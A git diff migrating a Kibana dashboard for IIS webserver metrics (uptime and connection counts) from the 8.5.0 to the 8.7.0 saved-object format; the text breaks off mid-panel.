a/packages/iis/kibana/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7.json b/packages/iis/kibana/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7.json index de11c1172ae..31fca83324d 100644 --- a/packages/iis/kibana/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7.json +++ b/packages/iis/kibana/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7.json @@ -1,1868 +1,1888 @@ { - "attributes": { - "description": "This dashboard shows metrics for the IIS server.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "id": "iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T17:17:42.355Z", + "created_at": "2023-11-07T17:17:42.355Z", + "version": "WzEwOCwxXQ==", + "attributes": { + "description": "This dashboard shows metrics for the IIS server.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.7.0", + "type": "visualization", + "gridData": { + "h": 5, + "i": "22d47dab-cb90-4eda-8b2c-c309a42e85d0", + "w": 10, + "x": 0, + "y": 0 + }, + "panelIndex": "22d47dab-cb90-4eda-8b2c-c309a42e85d0", + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "### IIS\n\n[**Webserver**](#/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7)| [Webserver processes](#/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7) | [Websites](#/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7) | [Application Pools](#/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7) \n\n\n\n", + "openLinksInNewTab": false + }, + "type": "markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "useMargins": true + "title": "Navigation Webserver Overview" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "df67a70e-5ca5-4822-9abf-98f68987176b", + "w": 9, + "x": 10, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } + "panelIndex": "df67a70e-5ca5-4822-9abf-98f68987176b", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-7d537da3-5163-404f-8219-5848d516628c", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "7d537da3-5163-404f-8219-5848d516628c": { + "columnOrder": [ + "f6a71cc2-db91-4eff-b44a-c8884fb221eb", + "81fcfbf0-0962-40df-968e-f7626bedb39c", + "81fcfbf0-0962-40df-968e-f7626bedb39cX0", + "81fcfbf0-0962-40df-968e-f7626bedb39cX1", + "f6a71cc2-db91-4eff-b44a-c8884fb221ebX0", + "f6a71cc2-db91-4eff-b44a-c8884fb221ebX1", + "81fcfbf0-0962-40df-968e-f7626bedb39cX2" + ], + "columns": { + "81fcfbf0-0962-40df-968e-f7626bedb39c": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.network.service_uptime))/3600", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.network.service_uptime))/3600", + "isFormulaBroken": false + }, + "references": [ + "81fcfbf0-0962-40df-968e-f7626bedb39cX2" + ], + "scale": "ratio" + }, + "81fcfbf0-0962-40df-968e-f7626bedb39cX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.service_uptime: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.service_uptime))/3600", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.service_uptime" + }, + "81fcfbf0-0962-40df-968e-f7626bedb39cX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.service_uptime))/3600", + "operationType": "overall_max", + "references": [ + "81fcfbf0-0962-40df-968e-f7626bedb39cX0" + ], + "scale": "ratio" + }, + "81fcfbf0-0962-40df-968e-f7626bedb39cX2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.service_uptime))/3600", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "81fcfbf0-0962-40df-968e-f7626bedb39cX1", + 3600 + ], + "location": { + "max": 66, + "min": 0 + }, + "name": "divide", + "text": "overall_max(last_value(iis.webserver.network.service_uptime))/3600", + "type": "function" } + }, + "references": [ + "81fcfbf0-0962-40df-968e-f7626bedb39cX1" + ], + "scale": "ratio" }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "### IIS\n\n[**Webserver**](#/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7)| [Webserver processes](#/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7) | [Websites](#/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7) | [Application Pools](#/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7) \n\n\n\n", - "openLinksInNewTab": false + "f6a71cc2-db91-4eff-b44a-c8884fb221eb": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Service Uptime (Hours)", + "operationType": "formula", + "params": { + "formula": "last_value(iis.webserver.network.service_uptime, kql='iis.webserver.network.service_uptime: *')/3600", + "isFormulaBroken": false + }, + "references": [ + "f6a71cc2-db91-4eff-b44a-c8884fb221ebX1" + ], + "scale": "ratio" }, - "type": "markdown", - "uiState": {} + "f6a71cc2-db91-4eff-b44a-c8884fb221ebX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.service_uptime: *" + }, + "isBucketed": false, + "label": "Part of Service Uptime (Hours)", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.service_uptime" + }, + "f6a71cc2-db91-4eff-b44a-c8884fb221ebX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Service Uptime (Hours)", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "f6a71cc2-db91-4eff-b44a-c8884fb221ebX0", + 3600 + ], + "location": { + "max": 100, + "min": 0 + }, + "name": "divide", + "text": "last_value(iis.webserver.network.service_uptime, kql='iis.webserver.network.service_uptime: *')/3600", + "type": "function" + } + }, + "references": [ + "f6a71cc2-db91-4eff-b44a-c8884fb221ebX0" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} } - }, - "gridData": { - "h": 5, - "i": "22d47dab-cb90-4eda-8b2c-c309a42e85d0", - "w": 10, - "x": 0, - "y": 0 - }, - "panelIndex": "22d47dab-cb90-4eda-8b2c-c309a42e85d0", - "title": "Navigation Webserver Overview", - "type": "visualization", - "version": "8.5.0" + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#D33115", + "layerId": "7d537da3-5163-404f-8219-5848d516628c", + "layerType": "data", + "maxAccessor": "81fcfbf0-0962-40df-968e-f7626bedb39c", + "metricAccessor": "f6a71cc2-db91-4eff-b44a-c8884fb221eb", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-7d537da3-5163-404f-8219-5848d516628c", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "7d537da3-5163-404f-8219-5848d516628c": { - "columnOrder": [ - "f6a71cc2-db91-4eff-b44a-c8884fb221eb", - "81fcfbf0-0962-40df-968e-f7626bedb39c", - "81fcfbf0-0962-40df-968e-f7626bedb39cX0", - "81fcfbf0-0962-40df-968e-f7626bedb39cX1", - "f6a71cc2-db91-4eff-b44a-c8884fb221ebX0", - "f6a71cc2-db91-4eff-b44a-c8884fb221ebX1", - "81fcfbf0-0962-40df-968e-f7626bedb39cX2" - ], - "columns": { - "81fcfbf0-0962-40df-968e-f7626bedb39c": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.network.service_uptime))/3600", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.network.service_uptime))/3600", - "isFormulaBroken": false - }, - "references": [ - "81fcfbf0-0962-40df-968e-f7626bedb39cX2" - ], - "scale": "ratio" - }, - "81fcfbf0-0962-40df-968e-f7626bedb39cX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.service_uptime: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.service_uptime))/3600", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.service_uptime" - }, - "81fcfbf0-0962-40df-968e-f7626bedb39cX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.service_uptime))/3600", - "operationType": "overall_max", - "references": [ - "81fcfbf0-0962-40df-968e-f7626bedb39cX0" - ], - "scale": "ratio" - }, - "81fcfbf0-0962-40df-968e-f7626bedb39cX2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.service_uptime))/3600", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "81fcfbf0-0962-40df-968e-f7626bedb39cX1", - 3600 - ], - "location": { - "max": 66, - "min": 0 - }, - "name": "divide", - "text": "overall_max(last_value(iis.webserver.network.service_uptime))/3600", - "type": "function" - } - }, - "references": [ - "81fcfbf0-0962-40df-968e-f7626bedb39cX1" - ], - "scale": "ratio" - }, - "f6a71cc2-db91-4eff-b44a-c8884fb221eb": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Service Uptime (Hours)", - "operationType": "formula", - "params": { - "formula": "last_value(iis.webserver.network.service_uptime, kql='iis.webserver.network.service_uptime: *')/3600", - "isFormulaBroken": false - }, - "references": [ - "f6a71cc2-db91-4eff-b44a-c8884fb221ebX1" - ], - "scale": "ratio" - }, - "f6a71cc2-db91-4eff-b44a-c8884fb221ebX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.service_uptime: *" - }, - "isBucketed": false, - "label": "Part of Service Uptime (Hours)", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.service_uptime" - }, - "f6a71cc2-db91-4eff-b44a-c8884fb221ebX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Service Uptime (Hours)", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "f6a71cc2-db91-4eff-b44a-c8884fb221ebX0", - 3600 - ], - "location": { - "max": 100, - "min": 0 - }, - "name": "divide", - "text": "last_value(iis.webserver.network.service_uptime, kql='iis.webserver.network.service_uptime: *')/3600", - "type": "function" - } - }, - "references": [ - "f6a71cc2-db91-4eff-b44a-c8884fb221ebX0" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#D33115", - "layerId": "7d537da3-5163-404f-8219-5848d516628c", - "layerType": "data", - "maxAccessor": "81fcfbf0-0962-40df-968e-f7626bedb39c", - "metricAccessor": "f6a71cc2-db91-4eff-b44a-c8884fb221eb", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Service Uptime" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "e2566135-ecc8-44a1-bbbd-9281dec8a9cc", + "w": 10, + "x": 19, + "y": 0 + }, + "panelIndex": "e2566135-ecc8-44a1-bbbd-9281dec8a9cc", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-07e96b37-8ca1-4d7c-bb37-99e4caa36c6f", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "07e96b37-8ca1-4d7c-bb37-99e4caa36c6f": { + "columnOrder": [ + "e24f827c-2613-4954-880e-f3948d13b892", + "12de5e25-d73e-47bf-a118-f099b68d9b6c", + "12de5e25-d73e-47bf-a118-f099b68d9b6cX0", + "12de5e25-d73e-47bf-a118-f099b68d9b6cX1" + ], + "columns": { + "12de5e25-d73e-47bf-a118-f099b68d9b6c": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.network.current_connections))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.network.current_connections))", + "isFormulaBroken": false + }, + "references": [ + "12de5e25-d73e-47bf-a118-f099b68d9b6cX1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 9, - "i": "df67a70e-5ca5-4822-9abf-98f68987176b", - "w": 9, - "x": 10, - "y": 0 - }, - "panelIndex": "df67a70e-5ca5-4822-9abf-98f68987176b", - "title": "Service Uptime", - "type": "lens", - "version": "8.5.0" + "12de5e25-d73e-47bf-a118-f099b68d9b6cX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.current_connections: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.current_connections))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.current_connections" + }, + "12de5e25-d73e-47bf-a118-f099b68d9b6cX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.current_connections))", + "operationType": "overall_max", + "references": [ + "12de5e25-d73e-47bf-a118-f099b68d9b6cX0" + ], + "scale": "ratio" + }, + "e24f827c-2613-4954-880e-f3948d13b892": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.current_connections: *" + }, + "isBucketed": false, + "label": "Current Connections", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.current_connections" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#68BC00", + "layerId": "07e96b37-8ca1-4d7c-bb37-99e4caa36c6f", + "layerType": "data", + "maxAccessor": "12de5e25-d73e-47bf-a118-f099b68d9b6c", + "metricAccessor": "e24f827c-2613-4954-880e-f3948d13b892", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-07e96b37-8ca1-4d7c-bb37-99e4caa36c6f", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "07e96b37-8ca1-4d7c-bb37-99e4caa36c6f": { - "columnOrder": [ - "e24f827c-2613-4954-880e-f3948d13b892", - "12de5e25-d73e-47bf-a118-f099b68d9b6c", - "12de5e25-d73e-47bf-a118-f099b68d9b6cX0", - "12de5e25-d73e-47bf-a118-f099b68d9b6cX1" - ], - "columns": { - "12de5e25-d73e-47bf-a118-f099b68d9b6c": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.network.current_connections))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.network.current_connections))", - "isFormulaBroken": false - }, - "references": [ - "12de5e25-d73e-47bf-a118-f099b68d9b6cX1" - ], - "scale": "ratio" - }, - "12de5e25-d73e-47bf-a118-f099b68d9b6cX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.current_connections: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.current_connections))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.current_connections" - }, - "12de5e25-d73e-47bf-a118-f099b68d9b6cX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.current_connections))", - "operationType": "overall_max", - "references": [ - "12de5e25-d73e-47bf-a118-f099b68d9b6cX0" - ], - "scale": "ratio" - }, - "e24f827c-2613-4954-880e-f3948d13b892": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.current_connections: *" - }, - "isBucketed": false, - "label": "Current Connections", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.current_connections" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#68BC00", - "layerId": "07e96b37-8ca1-4d7c-bb37-99e4caa36c6f", - "layerType": "data", - "maxAccessor": "12de5e25-d73e-47bf-a118-f099b68d9b6c", - "metricAccessor": "e24f827c-2613-4954-880e-f3948d13b892", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Current Connections" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "1798fa09-93f8-4dfc-85fa-6fc45fdd723a", + "w": 10, + "x": 29, + "y": 0 + }, + "panelIndex": "1798fa09-93f8-4dfc-85fa-6fc45fdd723a", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-ec54661b-482d-438e-b841-7ef6909d49a4", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "ec54661b-482d-438e-b841-7ef6909d49a4": { + "columnOrder": [ + "9853690d-6517-4282-b8ed-33f98569a178", + "6f34392d-0eaf-45d3-9b36-54bcbc83e644", + "6f34392d-0eaf-45d3-9b36-54bcbc83e644X0", + "6f34392d-0eaf-45d3-9b36-54bcbc83e644X1" + ], + "columns": { + "6f34392d-0eaf-45d3-9b36-54bcbc83e644": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.network.maximum_connections))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.network.maximum_connections))", + "isFormulaBroken": false + }, + "references": [ + "6f34392d-0eaf-45d3-9b36-54bcbc83e644X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 9, - "i": "e2566135-ecc8-44a1-bbbd-9281dec8a9cc", - "w": 10, - "x": 19, - "y": 0 - }, - "panelIndex": "e2566135-ecc8-44a1-bbbd-9281dec8a9cc", - "title": "Current Connections", - "type": "lens", - "version": "8.5.0" + "6f34392d-0eaf-45d3-9b36-54bcbc83e644X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.maximum_connections: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.maximum_connections))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.maximum_connections" + }, + "6f34392d-0eaf-45d3-9b36-54bcbc83e644X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.maximum_connections))", + "operationType": "overall_max", + "references": [ + "6f34392d-0eaf-45d3-9b36-54bcbc83e644X0" + ], + "scale": "ratio" + }, + "9853690d-6517-4282-b8ed-33f98569a178": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.maximum_connections: *" + }, + "isBucketed": false, + "label": "Maximum Connections", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.maximum_connections" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#68CCCA", + "layerId": "ec54661b-482d-438e-b841-7ef6909d49a4", + "layerType": "data", + "maxAccessor": "6f34392d-0eaf-45d3-9b36-54bcbc83e644", + "metricAccessor": "9853690d-6517-4282-b8ed-33f98569a178", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-ec54661b-482d-438e-b841-7ef6909d49a4", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "ec54661b-482d-438e-b841-7ef6909d49a4": { - "columnOrder": [ - "9853690d-6517-4282-b8ed-33f98569a178", - "6f34392d-0eaf-45d3-9b36-54bcbc83e644", - "6f34392d-0eaf-45d3-9b36-54bcbc83e644X0", - "6f34392d-0eaf-45d3-9b36-54bcbc83e644X1" - ], - "columns": { - "6f34392d-0eaf-45d3-9b36-54bcbc83e644": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.network.maximum_connections))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.network.maximum_connections))", - "isFormulaBroken": false - }, - "references": [ - "6f34392d-0eaf-45d3-9b36-54bcbc83e644X1" - ], - "scale": "ratio" - }, - "6f34392d-0eaf-45d3-9b36-54bcbc83e644X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.maximum_connections: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.maximum_connections))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.maximum_connections" - }, - "6f34392d-0eaf-45d3-9b36-54bcbc83e644X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.maximum_connections))", - "operationType": "overall_max", - "references": [ - "6f34392d-0eaf-45d3-9b36-54bcbc83e644X0" - ], - "scale": "ratio" - }, - "9853690d-6517-4282-b8ed-33f98569a178": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.maximum_connections: *" - }, - "isBucketed": false, - "label": "Maximum Connections", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.maximum_connections" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#68CCCA", - "layerId": "ec54661b-482d-438e-b841-7ef6909d49a4", - "layerType": "data", - "maxAccessor": "6f34392d-0eaf-45d3-9b36-54bcbc83e644", - "metricAccessor": "9853690d-6517-4282-b8ed-33f98569a178", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Maximum Connections" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "73702fa8-d011-45cc-af6c-9dd7c55701d9", + "w": 9, + "x": 39, + "y": 0 + }, + "panelIndex": "73702fa8-d011-45cc-af6c-9dd7c55701d9", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-3221f0ac-7ba8-4ca4-95fb-e81242261449", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "3221f0ac-7ba8-4ca4-95fb-e81242261449": { + "columnOrder": [ + "f990e733-b6b7-4e94-a686-3761d6105b9c", + "f990e733-b6b7-4e94-a686-3761d6105b9cX0", + "f990e733-b6b7-4e94-a686-3761d6105b9cX1", + "cc8270f5-66ed-4fe1-b05e-d1cfc451aa91" + ], + "columns": { + "cc8270f5-66ed-4fe1-b05e-d1cfc451aa91": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.total_connection_attempts: *" + }, + "isBucketed": false, + "label": "Total Connection Attempts", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_connection_attempts" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 9, - "i": "1798fa09-93f8-4dfc-85fa-6fc45fdd723a", - "w": 10, - "x": 29, - "y": 0 - }, - "panelIndex": "1798fa09-93f8-4dfc-85fa-6fc45fdd723a", - "title": "Maximum Connections", - "type": "lens", - "version": "8.5.0" + "f990e733-b6b7-4e94-a686-3761d6105b9c": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.network.total_connection_attempts))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.network.total_connection_attempts))", + "isFormulaBroken": false + }, + "references": [ + "f990e733-b6b7-4e94-a686-3761d6105b9cX1" + ], + "scale": "ratio" + }, + "f990e733-b6b7-4e94-a686-3761d6105b9cX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.total_connection_attempts: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.total_connection_attempts))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_connection_attempts" + }, + "f990e733-b6b7-4e94-a686-3761d6105b9cX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.total_connection_attempts))", + "operationType": "overall_max", + "references": [ + "f990e733-b6b7-4e94-a686-3761d6105b9cX0" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#FB9E00", + "layerId": "3221f0ac-7ba8-4ca4-95fb-e81242261449", + "layerType": "data", + "maxAccessor": "f990e733-b6b7-4e94-a686-3761d6105b9c", + "metricAccessor": "cc8270f5-66ed-4fe1-b05e-d1cfc451aa91", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-3221f0ac-7ba8-4ca4-95fb-e81242261449", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "3221f0ac-7ba8-4ca4-95fb-e81242261449": { - "columnOrder": [ - "f990e733-b6b7-4e94-a686-3761d6105b9c", - "f990e733-b6b7-4e94-a686-3761d6105b9cX0", - "f990e733-b6b7-4e94-a686-3761d6105b9cX1", - "cc8270f5-66ed-4fe1-b05e-d1cfc451aa91" - ], - "columns": { - "cc8270f5-66ed-4fe1-b05e-d1cfc451aa91": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.total_connection_attempts: *" - }, - "isBucketed": false, - "label": "Total Connection Attempts", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.total_connection_attempts" - }, - "f990e733-b6b7-4e94-a686-3761d6105b9c": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.network.total_connection_attempts))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.network.total_connection_attempts))", - "isFormulaBroken": false - }, - "references": [ - "f990e733-b6b7-4e94-a686-3761d6105b9cX1" - ], - "scale": "ratio" - }, - "f990e733-b6b7-4e94-a686-3761d6105b9cX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.total_connection_attempts: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.total_connection_attempts))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.total_connection_attempts" - }, - "f990e733-b6b7-4e94-a686-3761d6105b9cX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.total_connection_attempts))", - "operationType": "overall_max", - "references": [ - "f990e733-b6b7-4e94-a686-3761d6105b9cX0" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#FB9E00", - "layerId": "3221f0ac-7ba8-4ca4-95fb-e81242261449", - "layerType": "data", - "maxAccessor": "f990e733-b6b7-4e94-a686-3761d6105b9c", - "metricAccessor": "cc8270f5-66ed-4fe1-b05e-d1cfc451aa91", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Total Connection Attempts" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 8, + "i": "c523cd66-328a-41e9-bce9-1e1f95bae5de", + "w": 5, + "x": 0, + "y": 5 + }, + "panelIndex": "c523cd66-328a-41e9-bce9-1e1f95bae5de", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-4c16bca9-c2d9-43d0-ae94-22640d5d1137", + "type": 